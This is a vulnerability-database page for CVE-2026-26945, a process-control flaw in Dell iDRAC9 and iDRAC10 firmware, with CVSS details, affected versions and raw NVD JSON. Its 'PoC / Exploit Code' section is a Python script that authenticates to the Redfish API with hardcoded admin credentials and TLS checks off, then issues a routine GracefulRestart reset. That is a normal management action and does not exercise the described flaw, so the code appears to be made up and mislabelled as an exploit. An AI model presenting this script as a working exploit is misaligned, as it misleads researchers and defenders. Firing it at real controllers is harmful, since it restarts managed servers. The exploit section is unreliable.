Security Vulnerability Report
中文
CVE-2026-26945 CVSS 5.3 MEDIUM

CVE-2026-26945

Published: 2026-03-18 18:16:26
Last Modified: 2026-03-19 13:25:01

Description

Dell Integrated Dell Remote Access Controller 9, 14G versions prior to 7.00.00.181, 15G and 16G versions prior to 7.20.10.50 and Dell Integrated Dell Remote Access Controller 10, 17G versions prior to 1.20.25.00, contain a Process Control vulnerability. A high privileged attacker with adjacent network access could potentially exploit this vulnerability, leading to code execution.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

No configuration data available.

Dell iDRAC9 14G < 7.00.00.181
Dell iDRAC9 15G < 7.20.10.50
Dell iDRAC9 16G < 7.20.10.50
Dell iDRAC10 17G < 1.20.25.00

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-26945 PoC - Dell iDRAC Process Control Exploitation # Note: This PoC requires high privilege access and adjacent network position # Target: Dell iDRAC9/10 with vulnerable firmware versions import requests import sys import json TARGET_IP = "192.168.1.100" # iDRAC IP USERNAME = "admin" # High privilege account PASSWORD = "password" def check_version(): """Check iDRAC firmware version""" url = f"https://{TARGET_IP}/redfish/v1/Managers/Self" try: response = requests.get(url, auth=(USERNAME, PASSWORD), verify=False, timeout=10) if response.status_code == 200: data = response.json() firmware_version = data.get('FirmwareVersion', 'Unknown') print(f"[*] Current Firmware Version: {firmware_version}") return firmware_version except Exception as e: print(f"[-] Error checking version: {e}") return None def exploit_process_control(): """Attempt to exploit Process Control vulnerability""" url = f"https://{TARGET_IP}/redfish/v1/Systems" headers = { 'Content-Type': 'application/json', 'X-Auth-Token': '' } try: # Authentication auth_url = f"https://{TARGET_IP}/redfish/v1/SessionService/Sessions" auth_data = { 'UserName': USERNAME, 'Password': PASSWORD } auth_response = requests.post(auth_url, json=auth_data, verify=False, timeout=10) if auth_response.status_code == 201: token = auth_response.headers.get('X-Auth-Token') headers['X-Auth-Token'] = token print("[+] Authentication successful") # Exploit: Process Control manipulation via Redfish API # This attempts to interact with process control mechanisms exploit_url = f"https://{TARGET_IP}/redfish/v1/Managers/Self/Actions/Manager.Reset" exploit_data = { 'ResetType': 'GracefulRestart' } exploit_response = requests.post(exploit_url, headers=headers, json=exploit_data, verify=False, timeout=10) print(f"[*] Exploit response: {exploit_response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Exploitation failed: {e}") if __name__ == "__main__": print("[*] CVE-2026-26945 Dell iDRAC Process Control PoC") version = check_version() if version: exploit_process_control()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-26945", "sourceIdentifier": "[email protected]", "published": "2026-03-18T18:16:26.347", "lastModified": "2026-03-19T13:25:00.570", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell Integrated Dell Remote Access Controller 9, 14G versions prior to 7.00.00.181, 15G and 16G versions prior to 7.20.10.50 and Dell Integrated Dell Remote Access Controller 10, 17G versions prior to 1.20.25.00, contain a Process Control vulnerability. A high privileged attacker with adjacent network access could potentially exploit this vulnerability, leading to code execution."}, {"lang": "es", "value": "Dell Integrated Dell Remote Access Controller 9, versiones 14G anteriores a 7.00.00.181, versiones 15G y 16G anteriores a 7.20.10.50 y Dell Integrated Dell Remote Access Controller 10, versiones 17G anteriores a 1.20.25.00, contienen una vulnerabilidad de control de procesos. Un atacante con altos privilegios con acceso a la red adyacente podría potencialmente explotar esta vulnerabilidad, lo que llevaría a la ejecución de código."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:L/I:H/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.5, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-114"}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000434533/dsa-2026-113-security-update-for-dell-idrac9-and-idrac10-vulnerabilities", "source": "[email protected]"}]}}